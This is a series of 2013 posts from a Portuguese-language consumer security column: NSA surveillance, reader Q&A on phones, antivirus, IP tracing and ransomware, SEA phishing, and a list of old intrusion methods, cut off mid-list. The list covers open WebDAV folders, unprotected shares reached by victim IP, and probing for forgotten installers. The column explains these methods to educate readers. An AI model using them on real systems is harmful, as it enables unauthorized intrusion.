Depois do caso NSA, dá para esperar privacidade na internet?
ter, 17/09/13
por Altieres Rohr |
categoria Coluna
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
Nenhuma revelação trazida pelos documentos vazados por Edward Snowden, o ex-colaborador da Agência de Segurança Nacional dos Estados Unidos, a NSA, foi tão chocante quanto a de que a agência se envolveu diretamente na redução da segurança das tecnologias de internet, na quebra dos protocolos de segurança e na invasão de empresas de tecnologia para roubar as chaves criptográficas que estão no coração das tecnologias que garantem a privacidade na internet. A reação da comunidade tecnológica parece ter sido um “e agora?”.
Investigando a denúncia de que a NSA teria interferido com a segurança da web, o ativista John Gilmore analisou as discussões sobre a segurança no protocolo IPsec, que é usada para garantir o sigilo de comunicações com segurança extra na internet. Para Gilmore, a evidência é clara de que apareciam “engenheiros” que sugeriam ideias aparentemente boas, mas que tinham como consequência final a redução da segurança oferecida pelo protocolo.
Não menos grave é a informação de que a NSA estaria diretamente atacando servidores de provedores de internet para permitir a obtenção das chaves criptográficas que permitem a eles decodificar as transmissões interceptadas. Além dessas invasões, a NSA também teria autoridade para, dentro dos Estados Unidos, solicitar legalmente essas chaves dos provedores. Junto dessa solicitação, a empresa receberia uma ordem para jamais tocar no assunto.
Se isso não bastasse, a NSA tem à disposição supercomputadores capazes de quebrar os algoritmos usados na criptografia, e especialistas para usá-los da maneira mais eficiente possível.
Para o especialista em segurança Bruce Schneier, o governo norte-americano “traiu” a internet e “nós” devemos pegá-la de volta. O “nós” de Schneier são pessoas como ele: os especialistas em tecnologia e sistemas de segurança, as pessoas responsáveis por criar sistemas e manter sua integridade.
Ou seja: nem tudo está perdido. O próprio Schneier escreveu para o jornal “The Guardian” um guia para segurança, sugerindo aplicativos. As recomendações tem como base a criptografia. “Confie na matemática”, diz ele, referindo-se às complexas fórmulas matemáticas nas quais os processos de codificação para manter o sigilo dos dados se baseiam.
A recomendação de Schneier faz sentido. Os documentos revelam que a NSA tem tido mais sucesso com falhas nos softwares que fazem uso da criptografia do que na criptografia em si. Também por isso, Schneier desaconselha o uso da criptografia vendida comercialmente – o que significa que as melhores soluções são de graça.
Já o escritor de ficção científica e jornalista Cory Doctorow levantou uma sugestão contra as ordens do governo que impedem as empresas de revelar se já receberam ou não um pedido de dados do governo. A ideia é se antecipar e colocar um aviso nos sites, dizendo: “não recebemos nenhum pedido do governo”. A mensagem seria removida caso um pedido do governo fosse recebido. O fundamento é que o governo pode proibir alguém de dizer algo, mas não pode impedir alguém de não dizer algo.
Não há dúvida de que a interferência direta do governo norte-americano nas tecnologias de segurança causou muita surpresa, até mesmo para os especialistas. De repente, as teorias “malucas” de conspiração tinham mais verdade do que se imaginava. Mas a tecnologia não é ruim: basta ter mais cuidado com seu uso.
O detalhe mais importante, porém, é que nenhuma empresa vai facilitar a adoção disso tudo. Como disse Schneier, resolver isso ou não, cabe a “nós” – a quem está interessado.
Pacotão: e-mail com vírus aberto no iPhone?
qui, 12/09/13
por . |
categoria Sem categoria
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
>>> E-mail com vírus no iPhone
Abri um e-mail com vírus no meu iPhone e, por não saber que era vírus, cliquei no link que o e-mail recomendava. Quando percebi que era vírus saí rapidamente da página que estava carregando. Como posso saber se o vírus infectou o meu iPhone? Existe algum tipo de antivírus?
Leandro
O iPhone não pode ser infectado com as mesmas pragas digitais desenvolvidas para um computador, Leandro. Dessa forma, o telefone não foi infectado, a não ser que a página tenha uma praga específica para o celular – o que é improvável, considerando que não há registro de ataques dessa natureza contra o iOS do iPhone e do iPad.
>>> Quarentena ou remoção
Tenho uma dúvida a respeito de vírus e antivírus. Às vezes aparece uma mensagem dizendo que o antivírus detectou um vírus em meu computador. Gostaria de saber o que eu faço para tirar esse vírus de uma vez, sem que volte novamente. Eu envio para a quarentena ou excluo o vírus normalmente?
Adriane Gonçalves da Silva
Tenho uma dúvida a respeito de vírus e antivírus. Às vezes aparece uma mensagem dizendo que o antivírus detectou um vírus em meu computador. Gostaria de saber o que eu faço para tirar esse vírus de uma vez, sem que volte novamente. Eu envio para a quarentena ou excluo o vírus normalmente?
Adriane Gonçalves da Silva
Você pode sempre enviar para a quarentena, Adriane. Caso o antivírus esteja errado e o arquivo não seja um vírus, será possível restaurá-lo da quarentena depois. Se você remover o arquivo, isso não será possível. Ou seja, a quarentena só traz benefícios.
Vale, porém, uma observação relacionada ao que você perguntou sobre excluir “definitivamente” um vírus. Alguns códigos maliciosos detectados pelos antivírus são bastante corriqueiros e você os terá em seu computador sem fazer nada de diferente, apenas navegando na internet.
Você pode se proteger desses códigos mantendo o Windows atualizado. As atualizações automáticas podem ser configuradas no “Painel de Controle”. O detalhe é que o antivírus não tem como identificar que um determinado código é inofensivo porque você já atualizou seu sistema, então ele continuará alertando você frequentemente e solicitando a remoção desses arquivos, mesmo que seu sistema esteja imune.
Somente é possível identificar esse tipo de código por meio do “nome” dado ao vírus. Normalmente, esses códigos têm nomes como “JS”, “Iframe”, “Script”, “HTML” e termos semelhantes. Se o seu antivírus detectar um código com um desses nomes, pode ficar tranquila. Apenas lembre-se de manter o Windows atualizado.
>>> IP de conta desativada
Olá, eu fiz um Ask sobre a cidade onde eu moro, mas o pessoal daqui não aceita verdades e vão tentar rastrear meu IP, mas a conta já foi desativada. Tem como isso ocorrer?
Maria Elenice
Olá, eu fiz um Ask sobre a cidade onde eu moro, mas o pessoal daqui não aceita verdades e vão tentar rastrear meu IP, mas a conta já foi desativada. Tem como isso ocorrer?
Maria Elenice
Se for possível solicitar na Justiça essa informação – o que pode ser um tanto trabalhoso -, é bem provável que ainda exista o registro da conta sim, mesmo que ela tenha sido removida.
>>> Acesso ao banco via Wi-Fi
Fiquei com dúvida sobre a sua resposta sobre a rede Wi-Fi. Se o banco disponibilizar conexão SSL já na página que se preenche qualquer dado (chave de segurança, etc), então a conexão é segura, certo? Alguém até pode interceptar a comunicação, mas teria que conseguir descriptografar os dados, o que penso ser uma tarefa complexa. Concordo com relação a ser infectado por vírus, ter a máquina invadida etc. Mas se a página tem o cadeado de segurança, a troca de dados não poderia ser considerada segura?
Hamilton
Fiquei com dúvida sobre a sua resposta sobre a rede Wi-Fi. Se o banco disponibilizar conexão SSL já na página que se preenche qualquer dado (chave de segurança, etc), então a conexão é segura, certo? Alguém até pode interceptar a comunicação, mas teria que conseguir descriptografar os dados, o que penso ser uma tarefa complexa. Concordo com relação a ser infectado por vírus, ter a máquina invadida etc. Mas se a página tem o cadeado de segurança, a troca de dados não poderia ser considerada segura?
Hamilton
O problema de redes Wi-Fi inseguras não é apenas a interceptação direta dos dados, Hamilton, mas sim a capacidade do hacker de interferir no acesso, redirecionando seu computador para outros sites. Por exemplo, o hacker poderia alterar a página do banco de tal maneira a ir para outro site, inválido e com um endereço diferente, que também exiba o cadeado.
É bem verdade que, se você estiver realmente no site do banco e com o cadeado aparecendo, o ataque é bem difícil de ser realizado. Por outro lado, qualquer pequeno descuido pode ser aproveitado por um golpista – porque pode sim acontecer de você digitar (corretamente) o site do seu banco, mas acabar em uma página diferente após digitar o número de sua conta e agência. Nesse momento, talvez você não perceba que foi redirecionado.
Além disso, há técnicas reveladas recentemente que podem permitir a interceptação de dados criptografados com SSL. É por esses motivos que o melhor comportamento é evitar o acesso a partir de uma rede insegura.
O pacotão da coluna Segurança Digital vai ficando por aqui. Não se esqueça de deixar sua dúvida na área de comentários, logo abaixo. Até a próxima!
Como age um ‘vírus’ dentro do celular
ter, 10/09/13
por Altieres Rohr |
categoria Coluna
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
O termo “vírus” já é considerado incorreto para o uso em discussões técnicas de segurança. “Vírus”, como eram conhecidos, praticamente deixaram de existir. Hoje, somos vítimas de cavalos de Troia – programas que dizem realizar uma função A, mas realizam uma função B normalmente indesejada. Mas mesmo ignorando os aspectos mais técnicos de cada termo – afinal, é comum o uso da palavra “vírus” para se referir a qualquer tipo de programa indesejado -, a verdade é que muitos softwares maliciosos para celulares não são tão “maliciosos” assim.
Se você imagina que seu celular infectado com um vírus é capaz de infectar outros celulares, normalmente você estaria errado. Se você imagina que seu celular infectado pode infectar seu computador, normalmente você estaria errado também. Embora existam códigos com essas capacidades, como o envio de links por SMS ou a configuração de um arquivo de “Autorun” para infectar a máquina quando o aparelho for conectado via USB, esse comportamento não é comum.
As piores pragas para celulares se dividem em dois tipos: as que roubam informações e as que roubam dinheiro diretamente da vítima.
No primeiro grupo estão códigos programados para se passar por aplicativos bancários, softwares espiões que leem SMSs e capturam informações de chamada ou que ligam o microfone como no modo viva-voz para ouvir o som ambiente, entre outras atividades do gênero.
A segunda categoria é composta de aplicativos maliciosos que enviam os chamados “SMSs premium”. O objetivo é fazer com que o telefone envie SMSs para números especiais que aumentam a conta do usuário, e uma parcela da conta paga cai diretamente na conta dos responsáveis pelo vírus ou de algum “parceiro”. A maioria desses códigos não funciona no Brasil, pois os números de SMS usados não são reconhecidos pelas operadoras nacionais.
No entanto, a maior parte dos “vírus” de celular é muito menos perigosa do que isso. Muitos deles são programas que não fazem absolutamente nada, exceto exibir propagandas. Sim, eles capturam a informação de localização do seu telefone, talvez o número e outras informações – para saber qual propaganda exibir.
Quando um aplicativo malicioso para Android consegue ser publicado no Google Play, por exemplo, ele normalmente se encaixa nessa categoria. O software é sim fraudulento, porque os criminosos buscam usar nomes de outros apps populares para enganar internautas (ninguém baixaria o app de outra forma). No entanto, os apps normalmente estão longe do nível de malícia que os mencionados anteriormente.
É claro que alguns desses apps realizam funções bastante indesejáveis, como capturar a lista de e-mail dos contatos do telefone. Mas trata-se de um problema muito menor do que roubar uma senha bancária, que é uma atividade bastante corriqueira em “vírus” para computadores.
De certo modo, a situação lembra outro episódio antigo: quando softwares publicitários se tornaram populares no Windows, antivírus não reconheciam esses produtos como maliciosos. Outras empresas tinham esse entendimento, e programas para remoção desses programas tornaram-se populares para uso em conjunto com um antivírus. No outro extremo, aplicativos de segurança não muito honestos gostavam de detectar arquivos inofensivos, como “cookies”, para assustar pessoas.
Hoje, antivírus já sabem que devem detectar esses softwares publicitários fraudulentos, mesmo que eles não sejam tão maliciosos assim. O que os usuários devem ficar atentos – especialmente os de Android – é que tipo de “vírus” está sendo revelado em cada alerta divulgado por uma empresa antivírus. Alguns softwares são uma verdadeira ameaça, enquanto outros, embora indesejados, estão mais fazendo volume em estatísticas do que dano concreto, especialmente para quem não se arrisca a baixar apps fora dos repositórios oficiais.
Pacotão: como trabalhar em casa de forma segura?
qui, 05/09/13
por Altieres Rohr |
categoria Pacotão
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
>>> PC do trabalho em casa
Poderei trabalhar em casa graças ao acesso remoto. Na sua opinião é mais seguro possuir um PC ou notebook exclusivo para o trabalho em casa? Tenho receio de que como terei que instalar programas que possibilitarão o acesso remoto, os dados do meu PC ou notebook, inclusive a navegação na internet possam ser acessados pela área de Tecnologia da Informação (TI) da empresa. Ainda, será mais seguro uma conta de acesso à internet exclusiva também? Se eu só desplugar o cabo de um notebook para outro é seguro?
Obrigado
André
Poderei trabalhar em casa graças ao acesso remoto. Na sua opinião é mais seguro possuir um PC ou notebook exclusivo para o trabalho em casa? Tenho receio de que como terei que instalar programas que possibilitarão o acesso remoto, os dados do meu PC ou notebook, inclusive a navegação na internet possam ser acessados pela área de Tecnologia da Informação (TI) da empresa. Ainda, será mais seguro uma conta de acesso à internet exclusiva também? Se eu só desplugar o cabo de um notebook para outro é seguro?
Obrigado
André
André, essa dúvida que você levanta é muito interessante e não há uma resposta clara. Existem os dois lados da moeda: você, como colaborador da empresa, que está ligando seu computador em casa e se submetendo a certas regras da companhia, e a própria empresa, que estará transmitindo dados possivelmente sigilosos por meio de um sistema que não está totalmente sob o controle do departamento de TI.
Para ambas as partes, o ideal nesse caso é que o sistema seja exclusivo. Mas nós já vemos também outros tipos de dispositivos pessoais sendo usados para trabalho – como tablets e celulares. Alguns desses comportamentos são conhecidos pela sigla “BYOD” (Bring Your Own Device – traga seu próprio dispositivo).
Porém, o ideal é complicado, como você mesmo descreveu: ainda há a conexão de internet sendo compartilhada, a rede com os outros dispositivos, e o próprio espaço físico. Para que ter dois computadores no escritório ou dois celulares no bolso?
A sua preocupação é inteiramente válida. Se a área de TI da empresa não puder respeitar a privacidade do seu dispositivo pessoal e ainda quiser exercer o mesmo controle que exerce sobre os computadores do escritório, não há outra saída a não ser usar um computador ou notebook exclusivo para o trabalho.
Mas a empresa que oferece essas condições de trabalho também precisa estar ciente dos limites de controlar o computador pessoal de um funcionário e ajustar isso de acordo – ou sempre fornecer um equipamento para ser usado como patrimônio corporativo.
>>> Ativação do WhatsApp
Eu não sabia como ativar meu WhatsApp e pedi ajuda a um amigo que viu e copiou meu código de acesso do meu iPhone. Ele pode acessar remotamente meu WhatsApp? Como trocar o código de acesso? Obrigada
Maria Pessoa
Maria, o acesso ao WhatsApp está atrelado ao seu aparelho e número de telefone. O código de ativação que é enviado ao seu celular durante a instalação do aplicativo também está atrelado ao seu aparelho e não pode ser usado sem as informações que o WhatsApp usa para a autenticação (e que não são exibidas).
Dessa forma, apenas ter acesso ao código de ativação não é suficiente para acessar as mensagens de WhatsApp de outra pessoa.
Exatamente por esse motivo, o WhatsApp não dispõe de uma “senha” que pode ser trocada.
>>> Lentidão e criptografia (TrueCrypt)
Alguém já percebeu que ao encriptar o HD totalmente, o computador fica mais lento. Eu indico fazer um container de dados.
Matheus
Alguém já percebeu que ao encriptar o HD totalmente, o computador fica mais lento. Eu indico fazer um container de dados.
Matheus
Quando o disco é criptografado completamente, cada operação de acesso a dados requer um procedimento de decodificação. Quanto mais forte a criptografia usada para a proteção do disco, mais processamento será necessário para a operação e mais lento o computador ficará. Sua observação, Matheus, está correta.
O desempenho do computador será consideravelmente menor em um disco criptografado totalmente. Como normalmente não é necessário esse tipo de proteção – exceto em alguns casos -, o uso de um container de dados é muito mais interessante, sim.
O pacotão da coluna Segurança Digital vai ficando por aqui. Não se esqueça de deixar sua dúvida na área de comentários, logo abaixo. Até a próxima!
Apenas com e-mails, hackers sírios sequestram sites e perfis de Twitter
ter, 03/09/13
por Altieres Rohr |
categoria Coluna
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
Na semana passada, os sites do “New York Times” e do “Huffington Post” foram sequestrados e redirecionados para uma página controlada por hackers do Exército Eletrônico Sírio (Syrian Electronic Army, SEA na sigla em inglês). O sequestro dos sites, que também foi acompanhado de uma modificação no registro do domínio de Twitter, é mais um capítulo da onda de ataques realizados pelo SEA, todos contra alvos populares. O detalhe: a principal arma dos hackers é o e-mail.
Os hackers do SEA são ativistas favoráveis ao regime de Bashar al-Assad, ditador sírio que enfrenta uma guerra civil no país. A agência de notícias “Associated Press”, a “BBC”, o jornal “The Guardian” e até o perfil do Twitter da Copa do Mundo da FIFA já foram alvos do grupo.
Os nomes, claro, não param por aí: houve ainda uma invasão ao site da rede de rádios norte-americana NPR, o site de humor “The Onion”, a rede de notícias ITV, e também a rede de publicidade Outbrain, que deu ao SEA o controle sobre páginas da CNN, da revista Time e do jornal “Washington Post”. O grupo ainda teria obtido acesso ao banco de dados dos aplicativos Truecaller e Viber.
O SEA também já conseguiu até balançar o mercado financeiro com seus ataques: ao invadir o perfil do Twitter da “Associated Press”, os hackers tuitaram uma mensagem informando que o presidente Barack Obama teria sido assassinado. As bolsas de valores norte-americanas despencaram até que a informação falsa fosse retificada.
Apesar disso, o SEA não parece ter qualquer conhecimento privilegiado de falhas de segurança. Embora alguns dos ataques do grupo ainda não estejam bem explicados, muitos deles foram possíveis graças a uma arma simples: e-mails.
O roteiro é simples: o SEA descobre os endereços de e-mail dos alvos – como os repórteres que têm acesso a um perfil de Twitter – e enviam uma mensagem especial ao alvo, tentando convencê-lo a clicar em um link, acessar uma página clonada e digitar a senha, sem saber que está entregando suas credenciais aos hackers.
A invasão está pronta.
A simplicidade dos ataques ilustra a confiança que ainda é depositada na autenticação do acesso. Todas essas organizações teriam condições de utilizar sistemas próprios para gerenciar pelo menos os seus perfis de Twitter – que não teve culpa pelos ataques. Os perfis não viram apenas postagens não autorizadas, mas sim uma perda total do controle para os hackers, forçando a rede de microblog a suspender as contas e tomar medidas para devolvê-las aos seus legítimos donos.
Mesmo assim, o Twitter acrescentou um mecanismo de autenticação de dois fatores, com um código de uso único enviado para o celular. Essa segurança adicional encobre os problemas mais complexos com o gerenciamento inadequado de senhas, mas não os resolve.
Outra especialidade do SEA está na utilização de falhas já conhecidas. Após ser revelado que uma revendedora da registradora de domínios australiana Melbourne IT havia sido comprometida, permitindo o sequestro dos domínios do New York Times, Twitter e Huffington Post, o próprio site do Melbourne IT virou alvo de um ataque. O blog da empresa, que usava o sistema WordPress, foi invadido. Curiosamente, a página do blog tinha em destaque um texto sobre como proteger sites feitos no WordPress.
O SEA não demonstra o grande conhecimento técnico de hackers e a falência dos sistemas de segurança das empresas, mas é o resultados de repetidas tentativas de enganação com mensagens de e-mail e outros meios simples de comunicação.
‘Nacionalizar’ e-mail não é solução contra a espionagem dos EUA
seg, 02/09/13
por Altieres Rohr |
Quando o governo brasileiro mostrou preocupação com a segurança dos dados nacionais, esta coluna alertou que era muito fácil errar e fazer investimentos que não vão resolver o problema. Nesta segunda-feira (2), a profecia parece ter se tornado realidade, com o anúncio de que os Correios deverão desenvolver uma “solução nacional de e-mail”.
A ideia está errada já na forma em que foi anunciada. “E-mail” é um sistema específico de comunicação e troca de mensagens. Ele é definido por um padrão: assim como um quilômetro é entendido da mesma forma em todos os países adeptos do sistema métrico, tudo o que é “e-mail” funciona da mesma forma, não importa quem desenvolva. Se o governo não pretende seguir o padrão, então é outra coisa, mas não um sistema de e-mail. E se for um sistema de e-mail, ele deixa de ser nacional assim que abandonar as fronteiras do país – e eliminar fronteiras é, de certa forma, o objetivo da internet.
Mas isso é só a superfície do problema. Nos bastidores, os códigos programados são convertidos em linguagem de máquina, aquela que os computadores entendem, por meio de softwares especiais chamados “compiladores” ou “interpretadores”. Compiladores tendem a ser difíceis de programar corretamente e de maneira eficiente.
Será que o compilador também será nacional? E o sistema operacional que será usado para abrigar esse sistema de e-mail? E o hardware dos computadores?
Mesmo ignorando todos esses problemas, a ideia continua sendo ruim.
Se o governo quer mesmo um sistema de e-mail “nacional”, isso é totalmente desnecessário. Vejamos por quê.
1. A maior parte dos servidores de e-mail do mundo é de código aberto, ou seja, podemos saber exatamente o que eles fazem. Se o governo quer indícios de espionagem, deveria solicitar uma auditoria nesses códigos. Vale a pena porque são códigos robustos, com bom histórico e que já tiveram muitas falhas solucionadas – características invejáveis que um sistema nacional não terá antes de amadurecer. De quebra, a internet inteira estará mais segura se uma espionagem for encontrada.
2. Se o objetivo é ter apenas um meio de comunicação, não necessariamente o e-mail, a ideia do governo continua sendo desnecessária. Porque já existem soluções prontas para resolver esse problema, como é o caso do SILC (Secure Internet Live Conferencing), que é um protocolo de chat com o objetivo de garantir a privacidade das comunicações. Este, também, tem software de código aberto compatível. Basta auditar.
3. Além disso, o e-mail, tal como existe hoje, pode ser usado para transferir mensagens codificadas de forma segura. A internet funciona com “camadas de protocolo”. Um protocolo mais “acima” é capaz, na maioria das vezes, de eliminar deficiências nas camadas inferiores. A criptografia, que de fato garante a segurança, não raramente ocorre na camada mais superior.
O PGP (Pretty Good Privacy), que é o método tradicional para garantir a segurança em e-mail, não modifica em nada a maneira que o e-mail funciona, porque ele deve garantir o sigilo apesar da interceptação. A Agência Brasileira de Inteligência (Abin) dispõe do Centro de Pesquisas e Desenvolvimento para a Segurança das Comunicações (Cepesc), que deve ser o órgão mais capaz para desenvolver uma camada de segurança adicional para ser usada em qualquer protocolo, seja um e-mail ou um chat do Skype.
O PGP (Pretty Good Privacy), que é o método tradicional para garantir a segurança em e-mail, não modifica em nada a maneira que o e-mail funciona, porque ele deve garantir o sigilo apesar da interceptação. A Agência Brasileira de Inteligência (Abin) dispõe do Centro de Pesquisas e Desenvolvimento para a Segurança das Comunicações (Cepesc), que deve ser o órgão mais capaz para desenvolver uma camada de segurança adicional para ser usada em qualquer protocolo, seja um e-mail ou um chat do Skype.
A escolha dos Correios também é duvidosa. O foco dos Correios está no desenvolvimento de processos de logística para realização de entregas, não no desenvolvimento de fórmulas matemáticas complexas e de programação segura. Mas não é preciso questionar a competência de nenhum profissional ou organização nesse caso. Mesmo que o sistema desenvolvido seja perfeito e adequado, ele ainda foi desnecessário.
Pacotão: quem pode ser vítima do vírus que ‘sequestra’ arquivos?
qui, 29/08/13
por Altieres Rohr |
categoria Coluna
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
>>> Ransomware
O ransomware que tranca os arquivos dos usuários com senha, só afeta computadores de empresas? E quanto a usuários domésticos? A atualização constante do Windows já resolve o problema? E que outras medidas podemos tomar para evitar esse tipo de ataque (que, para mim, parece bem assustador!)? Tem como desativar ou “matar” o recurso de área de trabalho remota?
Edu
O ransomware que tranca os arquivos dos usuários com senha, só afeta computadores de empresas? E quanto a usuários domésticos? A atualização constante do Windows já resolve o problema? E que outras medidas podemos tomar para evitar esse tipo de ataque (que, para mim, parece bem assustador!)? Tem como desativar ou “matar” o recurso de área de trabalho remota?
Edu
É importante não confundir meios de ataque com objetivos do ataque ou tipo de fraude, Edu. Sobre o vírus que sequestra arquivos e que pegou muita gente de surpresa aqui no Brasil, ele, especificamente, era disseminado por meio de uma falha no recurso da Área de Trabalho Remota e, por isso, atingiu mais sistemas ligados a redes empresariais, onde o recurso é mais utilizado.
Por outro lado, qualquer praga digital pode usar o mesmo modelo de fraude ou de ataque.
Em outras palavras, nós poderíamos ter uma praga digital que rouba senhas bancárias que se espalha por esse mesmo modo (pela Área de Trabalho Remota), como também poderíamos ter uma praga que sequestra arquivos e que é disseminada por e-mails maliciosos ou por sites falsos, que é o modelo normalmente usado pelos ladrões de senhas bancárias feitos no Brasil.
Cada forma de infectar um computador pode ser usada para realizar qualquer tipo de fraude. O que acontece na realidade depende dos ataques específicos que os hackers realizam.
O recurso de Área de Trabalho Remota vem desativado de fábrica no Windows. É preciso que ele seja expressamente ativado para aceitar conexões remotas.
>>> IP no Wi-Fi
Alguém poderia me responder pela NET VIRTUA sendo IP fixo de número x e pelo Wi-Fi número fixo y também, os mesmos seriam vistos como da mesma pessoa? Explico: Se acesso um site pelo PC o IP fixo é um, acessando pelo celular via Wi-Fi o IP fixo é outro, isto vendo por um site o registro sairia para a mesma pessoa. Não sei se fui clara!
Laura
Alguém poderia me responder pela NET VIRTUA sendo IP fixo de número x e pelo Wi-Fi número fixo y também, os mesmos seriam vistos como da mesma pessoa? Explico: Se acesso um site pelo PC o IP fixo é um, acessando pelo celular via Wi-Fi o IP fixo é outro, isto vendo por um site o registro sairia para a mesma pessoa. Não sei se fui clara!
Laura
O IP alocado pelo provedor de internet provavelmente não é fixo, Laura. O que pode ser fixo é o endereço IP usado em sua rede doméstica, que é alocado pelo roteador do modem e do Wi-Fi.
Explicando melhor: quando seu modem se conecta à internet, o provedor dá a ele um endereço IP. Esse é o seu endereço “real” na internet. O modem pode, em algumas configurações, repassar esse IP recebido diretamente ao seu computador (modo “bridge” ou “ponte”).
Normalmente, porém, até por questões de segurança, o modem faz papel de roteador e dá ao seu computador um dos chamados “endereços internos”. São números que não podem ser usados na internet e servem apenas para redes internas, como a que existe na sua casa.
Por esse motivo, seus computadores ou celulares dentro de casa terão IPs fixos e diferentes, mas, ao se conectarem com a internet, compartilharão o IP (do modem/roteador). Dessa forma, realmente não é possível identificar quem especificamente realizou uma conexão.
>>> IP de usuário no Facebook
Uma pessoa usando um perfil falso mandou mensagens para mim me chantageando, contendo fotos supostamente minhas postadas no Facebook. Essas fotos seriam print de publicações ou fotos no suposto perfil que a pessoa diz que é meu. As fotos possuem endereço URL que tentei acessar, mas quando tentei abrir dava que o conteúdo não existia mais, aparentemente parece ter sido excluído. Tem como descobrir o IP da pessoa que postou as fotos pelo endereço URL de fotos que foram excluídas no Facebook ou de perfil desativado ou excluído? E tem como eu descobrir o IP dessa pessoa pelas mensagens e fotos que ela me enviou?
Obrigada!
Lara da Silva
Uma pessoa usando um perfil falso mandou mensagens para mim me chantageando, contendo fotos supostamente minhas postadas no Facebook. Essas fotos seriam print de publicações ou fotos no suposto perfil que a pessoa diz que é meu. As fotos possuem endereço URL que tentei acessar, mas quando tentei abrir dava que o conteúdo não existia mais, aparentemente parece ter sido excluído. Tem como descobrir o IP da pessoa que postou as fotos pelo endereço URL de fotos que foram excluídas no Facebook ou de perfil desativado ou excluído? E tem como eu descobrir o IP dessa pessoa pelas mensagens e fotos que ela me enviou?
Obrigada!
Lara da Silva
Lara, o Facebook provavelmente tem sim esse registro. Mas ele só será cedido mediante uma ordem judicial. Você pode verificar com a polícia se o caso foi grave o suficiente para enquadrar em algum crime e registrar um boletim de ocorrência ou então contratar um advogado particular para buscar esses dados.
Porém, como o conteúdo já não está mais disponível, pode ser difícil provar o que houve.
Em todo caso, tome cuidado ao seguir esses links com “chantagens”, já que muitos deles, especialmente em e-mails, levam na verdade a pragas digitais.
O pacotão da coluna Segurança Digital vai ficando por aqui. Não se esqueça de deixar sua dúvida na área de comentários, logo abaixo. Até a próxima!
Hackear pode ser fácil: conheça 9 falhas de segurança absurdas
ter, 27/08/13
por Altieres Rohr |
categoria Coluna
Se você tem alguma dúvida sobre segurança da informação (antivírus, invasões, cibercrime, roubo de dados etc.) vá até o fim da reportagem e utilize a seção de comentários. A coluna responde perguntas deixadas por leitores todas as quintas-feiras.
Hackers fazem coisas aparentemente incríveis, invadindo sistemas, desfigurando websites e obtendo informações secretas. No entanto, a ação deles é muitas vezes mais fácil do que se imagina, graças à existência de falhas de segurança absurdas que podem ser exploradas até por pessoas sem grandes conhecimentos em informática. E um dos segredos dos hackers é escolher os alvos certos (e fáceis). A coluna Segurança Digital traz hoje alguns exemplos.
1. “Pasta da Web”
Trata-se de uma falha popularmente conhecida como “Pasta da Web” ou “pdw”, devido ao recurso do Windows chamado “Pastas da Web” que permitia explorá-la. Nos Windows 95, 98 ou NT, bastava o hacker adicionar o site vulnerável em um recurso chamada “Pastas da Web” no Windows e as pastas e arquivos do site iriam aparecer. A partir daí era possível alterar o site como se altera qualquer arquivo no próprio computador.
Trata-se de uma falha popularmente conhecida como “Pasta da Web” ou “pdw”, devido ao recurso do Windows chamado “Pastas da Web” que permitia explorá-la. Nos Windows 95, 98 ou NT, bastava o hacker adicionar o site vulnerável em um recurso chamada “Pastas da Web” no Windows e as pastas e arquivos do site iriam aparecer. A partir daí era possível alterar o site como se altera qualquer arquivo no próprio computador.
O erro está na verdade ligado ao protocolo conhecido como WebDAV. É uma tecnologia para o gerenciamento de sites de internet. Infelizmente, muitos administradores de sistema esqueciam recursos usados no WebDAV ativados e sem senha, permitindo que qualquer pessoa alterasse a página da web.
O recurso de “Pasta da Web” ainda existe nas versões mais recentes no Windows, dentro da função “Mapear unidade de rede” em “Computador”. No entanto, é bem difícil encontrar sites com essa falha hoje em dia.
2. Compartilhamento sem senha e falha na autenticaçãoEm versões antigas do Windows, era comum criar compartilhamento de arquivo sem senha. Esse compartilhamento, que era destinado a computadores de uma rede local (como computadores de uma rede de escolas ou de uma empresa que acessavam os arquivos dos outros sistemas) ficava disponível na internet, permitindo que qualquer pessoa pudesse acessar os arquivos locais do computador.
Se a vítima estivesse vulnerável, bastava abrir o “Windows Explorer” e digitar “\\IP da vítima” na localização. Todas as pastas compartilhadas seriam exibidas, podendo ser lidas, modificadas ou apagadas. Por esse motivo, esse ataque ficou conhecido como “invasão por IP”, já que, no Windows, bastava saber o IP da vítima para explorar a falha.
No entanto, nem mesmo quem configurou a senha escapou do ataque. O Windows tinha uma falha de segurança que permitia o acesso apenas com o primeiro caractere da senha. Ou seja, se a senha era “iv9!0v#4%a5″, bastava tentar “i”. A vulnerabilidade, que existia nos Windows 95, 98 e ME, foi explorada por um vírus chamado Opaserv, que tentava todas as possibilidades de um caracteres, podendo assim invadir qualquer sistema com arquivo compartilhado que não tivesse aplicado a atualização de segurança.
3. Instalador esquecidoMuitos sites na internet são criados a partir de softwares prontos. Para isso, o responsável pelo site precisa “instalar” o software no site. Durante o processo de instalação, uma senha é configurada.
Em muitos casos, esses instaladores são esquecidos. Para hackear o site, tudo o que hacker precisa fazer é acessar o instalador, seguir as opções que aparecem na tela e reconfigurar a senha administrativa. Para encontrar sites vulneráveis, um hacker utiliza um software que tenta acessar endereços como “/setup/” ou “/install/” em sites de internet, até que um eventualmente esteja vulnerável.
Hoje, instaladores possuem funções de trava para que não sejam executados mais de uma vez – porque muita gente ainda se esquece de apagar o instalador após usá-lo.
4. FrontPage e senha on-lineO Microsoft FrontPage era um software para edição de sites de internet. Entre seus recursos estava a possibilidade de editar os sites on-line a partir do próprio programa, usando as “extensões do FrontPage” no servidor que abrigava a página on-line.
